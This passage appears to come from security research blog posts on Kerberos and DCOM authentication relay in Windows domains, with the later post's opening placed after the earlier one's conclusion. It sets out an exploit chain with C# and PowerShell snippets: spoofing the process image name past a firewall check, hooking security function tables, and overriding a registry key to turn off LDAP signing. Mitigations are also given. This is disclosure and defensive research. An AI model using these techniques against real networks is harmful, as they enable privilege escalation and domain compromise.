Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, because the ADDRESS value was inserted into the binding by plain string concatenation, the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.
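The effect of concatenation versus escaping can be shown with a toy model in Python. None of this is the RPC runtime's real parser or the real RpcStringBindingCompose implementation: the helper names are hypothetical, and backslash-escaping the brackets is an assumption used here only to show why an escaped port is no longer treated as an endpoint.

```python
import re


def naive_binding(address, port=135):
    """Pre-fix behaviour as described: paste the address straight into the binding."""
    return f"ncacn_ip_tcp:{address}[{port}]"


def escaped_binding(address, port=135):
    """Toy stand-in for proper composition: escape brackets inside the address."""
    safe_address = address.replace("[", "\\[").replace("]", "\\]")
    return f"ncacn_ip_tcp:{safe_address}[{port}]"


def first_port(binding):
    """Model a parser that uses the first unescaped [port] it finds."""
    match = re.search(r"(?<!\\)\[(\d+)\]", binding)
    return int(match.group(1)) if match else None


attacker_address = "127.0.0.1[9999]"   # address field smuggling its own port

print(naive_binding(attacker_address), first_port(naive_binding(attacker_address)))
print(escaped_binding(attacker_address), first_port(escaped_binding(attacker_address)))
```

In the naive case the model parser picks the attacker's port 9999; once the brackets are escaped, the only endpoint it recognises is the appended port 135.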

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of a DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, I wondered: could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());
var std = COMObjRefStandard.FromArray(ba);
Console.WriteLine("IPID: {0}", std.Ipid);
Console.WriteLine("OXID: {0:X08}", std.Oxid);
Console.WriteLine("OID : {0:X08}", std.Oid);

// Replace the string bindings with a single TCP binding for localhost.
std.StringBindings.Clear();
std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine("objref:{0}:", Convert.ToBase64String(std.ToArray()));

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall, so the dialog can be dismissed safely. Going back to the COM client, though, we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):

"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {
  INetFwMgr* mgr;

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER,
                   IID_PPV_ARGS(&mgr));
  VARIANT Allowed;
  VARIANT Restricted;
  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY,
                     PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,
                     &Allowed, &Restricted);
  if (VT_BOOL != Allowed.vt)
    return FALSE;
  return Allowed.boolVal == VARIANT_TRUE;
}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {
    param(
        [string]$Name,
        [int]$Port
    )
    $mgr = New-Object -ComObject "HNetCfg.FwMgr"
    $allow = $null
    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)
    $allow
}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {
    if (Test-IsPortOpen $f.FullName 12345) {
        Write-Host $f.Fullname
    }
}

This script enumerates all executable files in system32 and checks if they'd be allowed to listen on TCP port 12345. Normally the TCP port would be selected automatically; however, the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense: the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.
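To make the filtering behaviour concrete, here is a minimal, portable C++ sketch of it. It is only a model of what is described here, not RPCSS code: `TcpBinding`, `FirewallCheck`, `ResolveBindings` and `OnlySvchost` are hypothetical names, and the firewall query is replaced with a toy policy that accepts only a path ending in `\svchost.exe`. The one real value is 1722, the Win32 error code carried in the low 16 bits of the HRESULT 0x800706BA seen earlier.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <string>
#include <vector>

// Win32 error behind HRESULT 0x800706BA (low 16 bits: 0x06BA == 1722).
constexpr std::uint32_t kRpcSServerUnavailable = 1722;

// Hypothetical stand-in for one TCP binding registered by a COM server.
struct TcpBinding {
    std::string host;
    int port;
};

// Hypothetical stand-in for the firewall query (IsPortOpen in the text).
using FirewallCheck = std::function<bool(const std::string& image, int port)>;

// Keeps only the bindings the firewall check accepts. Returns 0 on success,
// or kRpcSServerUnavailable when no binding survives the filter.
std::uint32_t ResolveBindings(const std::string& image,
                              const std::vector<TcpBinding>& registered,
                              const FirewallCheck& is_port_open,
                              std::vector<TcpBinding>& out) {
    out.clear();
    for (const TcpBinding& b : registered) {
        if (is_port_open(image, b.port)) out.push_back(b);
    }
    return out.empty() ? kRpcSServerUnavailable : 0;
}

// Toy policy (an assumption for this sketch): only an image path ending in
// "\svchost.exe" passes. The comparison is case-sensitive for simplicity.
bool OnlySvchost(const std::string& image, int /*port*/) {
    const std::string suffix = "\\svchost.exe";
    return image.size() >= suffix.size() &&
           image.compare(image.size() - suffix.size(), suffix.size(),
                         suffix) == 0;
}
```

Calling `ResolveBindings` with the server's real image path and `OnlySvchost` leaves the output list empty and returns 1722, which is the failure the COM client reports. The same call with a path ending in `\svchost.exe` returns the TCP binding.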

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code in there. However, that is harder to achieve through pure .NET code and also injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {
    new SOLE_AUTHENTICATION_SERVICE() {
      dwAuthnSvc = RpcAuthenticationType.Kerberos,
      pPrincipalName = "HOST/DC.domain.com"
    }
};
var str = SetProcessModuleName("System");
try
{
   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
        IntPtr.Zero);
}
finally
{
    SetProcessModuleName(str);
}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot, has a list of values. Each value's name is the number assigned to the authentication service; for example, 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is the name of the DLL to load which provides the API; for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect, we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL so we don't even need to modify the memory protection.
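The table-patching idea can be shown with a small, portable C++ model. This is a sketch under heavy assumptions rather than the real hook: `FakeSecurityTable`, `FakeInitSecurityInterface`, `RealAcceptToken` and the other names are hypothetical, the table has a single entry, and the signature is simplified. It only illustrates the pattern of fetching the shared table early, saving the original pointer, and swapping in a function that records its input before forwarding.

```cpp
#include <cassert>
#include <string>
#include <vector>

typedef int (*AcceptFn)(const std::string& token);

// Hypothetical, simplified stand-in for a security function table; the real
// table has many more entries and different signatures.
struct FakeSecurityTable {
    AcceptFn AcceptToken;
};

// The "library" implementation and its pre-initialized, writable table.
int RealAcceptToken(const std::string& token) {
    return token.empty() ? -1 : 0;
}
FakeSecurityTable g_table = {&RealAcceptToken};

// Stand-in for the exported initializer: every caller gets the same pointer.
FakeSecurityTable* FakeInitSecurityInterface() { return &g_table; }

// Hook state: the saved original pointer and the tokens seen so far.
AcceptFn g_original_accept = nullptr;
std::vector<std::string> g_captured;

int HookedAcceptToken(const std::string& token) {
    assert(g_original_accept != nullptr);
    g_captured.push_back(token);      // record what the caller passed in
    return g_original_accept(token);  // then forward to the original
}

// Installs the hook; intended to run before any other consumer fetches the
// table. Calling it twice is harmless.
void InstallHook() {
    FakeSecurityTable* table = FakeInitSecurityInterface();
    if (table->AcceptToken == &HookedAcceptToken) return;
    g_original_accept = table->AcceptToken;
    table->AcceptToken = &HookedAcceptToken;
}
```

Because every caller receives a pointer to the same table, anything that fetches it after `InstallHook()` runs goes through `HookedAcceptToken` without knowing it. The model depends on that shared-table property.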

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {
  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {
    if (IsLoopback())
      this->UnsafeLoopbackAuth = TRUE;
  }
}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, such as RPC_C_AUTHN_LEVEL_PKT_CONNECT, and the authentication was from the same system, then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server checks whether the flag is true; if it is, the call is immediately rejected before any code is called in the server, including the RPC interface's security callback. The only ways to pass this check are for the authentication not to come from the local system, or for the authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above, which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.
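The decision can be summarised as a tiny truth table. The following portable C++ sketch models only the logic described above; it is not the RPC runtime's code. The function names are hypothetical, and the enum repeats the numeric values of the Windows SDK's RPC_C_AUTHN_LEVEL_* constants so that the snippet builds without Windows headers.

```cpp
#include <cassert>

// Numeric values of the Windows SDK's RPC_C_AUTHN_LEVEL_* constants,
// repeated here so the sketch builds without Windows headers.
enum AuthnLevel {
    kDefault = 0,
    kNone = 1,
    kConnect = 2,       // the connect level discussed in the text
    kCall = 3,
    kPkt = 4,
    kPktIntegrity = 5,
    kPktPrivacy = 6
};

// Models the flag set by ValidateUpgradeCriteria: loopback authentication
// below the packet integrity level is marked as unsafe.
bool IsUnsafeLoopbackAuth(AuthnLevel level, bool is_loopback) {
    return level < kPktIntegrity && is_loopback;
}

// Models the per-call check: a call is rejected up front when the flag is set.
bool CallAllowed(AuthnLevel level, bool is_loopback) {
    return !IsUnsafeLoopbackAuth(level, is_loopback);
}
```

Only two combinations get through: non-loopback authentication at any level, or loopback authentication at integrity level or above. A relay can't use the second, because it doesn't have the session key.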

Instead, as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it would seem a reasonable target. As we'll see, this imposes a limitation on the source of the authentication, as it must not enable Integrity, otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API but convert it into using relayed authentication?

Unsurprisingly the library doesn't have an "Enable relayed authentication" mode, but after a few minutes in a disassembler, it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method. I could repurpose my code for capturing the authentication for relaying the authentication. There was initially a minor issue: accidentally or on purpose, there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook, as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]
static extern int RegOverridePredefKey(
    IntPtr hKey,
    IntPtr hNewHKey
);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)
{
    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,
        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);
    if (res != 0)
        throw new Win32Exception(res);
}

static void LoadLDAPLibrary()
{
    string dummy = @"SOFTWARE\DUMMY";
    string target = @"System\CurrentControlSet\Services\LDAP";
    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))
    {
        using (var okey = key.CreateSubKey(target, true))
        {
            okey.SetValue("LdapClientIntegrity", 0,
                          RegistryValueKind.DWord);
            OverrideLocalMachine(key);
            try
            {
                IntPtr lib = LoadLibrary("wldap32.dll");
                if (lib == IntPtr.Zero)
                    throw new Win32Exception();
            }
            finally
            {
                OverrideLocalMachine(null);
                Registry.CurrentUser.DeleteSubKeyTree(dummy);
            }
        }
    }
}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it might provide some ideas of how to implement something similar by using what's already available, without always needing to write your own protocol servers and clients.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos or NTLM significantly less useful.

Using Kerberos for Authentication Relay Attacks

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must automatically perform the authentication without user interaction otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni and Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed performing MitM on network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk. The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand, Kerberos has always required the target of the authentication to be specified beforehand through a principal name. Typically this is a Service Principal Name (SPN), although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.
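As a quick illustration of that string form, here is a minimal C++ sketch that splits an SPN into its four parts. The `Spn` struct and `ParseSpn` function are hypothetical helpers written for this post, not a Windows API. The parser does no validation beyond requiring a class and an instance, and it assumes the instance itself contains no ':' character.

```cpp
#include <cassert>
#include <string>

struct Spn {
    std::string service_class;  // e.g. "HTTP" or "CIFS"
    std::string instance;       // usually the server's DNS name
    std::string port;           // optional, empty when absent
    std::string name;           // optional, empty when absent
};

// Splits "CLASS/INSTANCE[:PORT][/NAME]". Returns false when the class or the
// instance is missing; `out` may be partially filled in that case.
bool ParseSpn(const std::string& text, Spn& out) {
    const std::string::size_type first = text.find('/');
    if (first == std::string::npos || first == 0) return false;

    out = Spn();
    out.service_class = text.substr(0, first);

    // Everything after the first '/' is INSTANCE[:PORT][/NAME].
    std::string rest = text.substr(first + 1);
    const std::string::size_type second = rest.find('/');
    if (second != std::string::npos) {
        out.name = rest.substr(second + 1);
        rest = rest.substr(0, second);
    }

    const std::string::size_type colon = rest.find(':');
    if (colon != std::string::npos) {
        out.port = rest.substr(colon + 1);
        rest = rest.substr(0, colon);
    }

    if (rest.empty()) return false;
    out.instance = rest;
    return true;
}
```

For example, `ParseSpn("HTTP/web.domain.com:8080/app", spn)` fills in the class `HTTP`, the instance `web.domain.com`, the port `8080` and the name `app`, while `CIFS/fileserver.domain.com` leaves the port and name empty.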

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is an HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.
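The two cases above can be captured in a toy model. In this C++ sketch the directory is just a map from SPN to owning account, and a ticket counts as decryptable by a target service only if both SPNs belong to the same account, which stands in for sharing the same key. The account name `EVIL$` and the function names are assumptions made up for the example. The model ignores any SPN check the service itself might perform, and it matches SPNs as exact strings.

```cpp
#include <cassert>
#include <map>
#include <string>

typedef std::map<std::string, std::string> SpnDirectory;

// Toy directory: SPN -> owning account. Entries are illustrative only.
SpnDirectory ExampleDirectory() {
    SpnDirectory d;
    d["CIFS/fileserver.domain.com"] = "FILESERVER$";
    d["HTTP/fileserver.domain.com"] = "FILESERVER$";
    d["CIFS/evil.com"] = "EVIL$";  // hypothetical attacker-controlled host
    return d;
}

// A ticket issued for `ticket_spn` can be decrypted by the service behind
// `target_spn` only when both SPNs are registered to the same account,
// because the key is derived from that account's password.
bool TicketDecryptableBy(const SpnDirectory& dir,
                         const std::string& ticket_spn,
                         const std::string& target_spn) {
    const SpnDirectory::const_iterator t = dir.find(ticket_spn);
    const SpnDirectory::const_iterator s = dir.find(target_spn);
    if (t == dir.end() || s == dir.end()) return false;  // unregistered SPN
    return t->second == s->second;
}
```

With this directory a CIFS ticket for fileserver.domain.com is usable against the HTTP service on the same host. A ticket for CIFS/evil.com is not usable against the file server, which is why control over the SPN is the crux of the attack.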

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

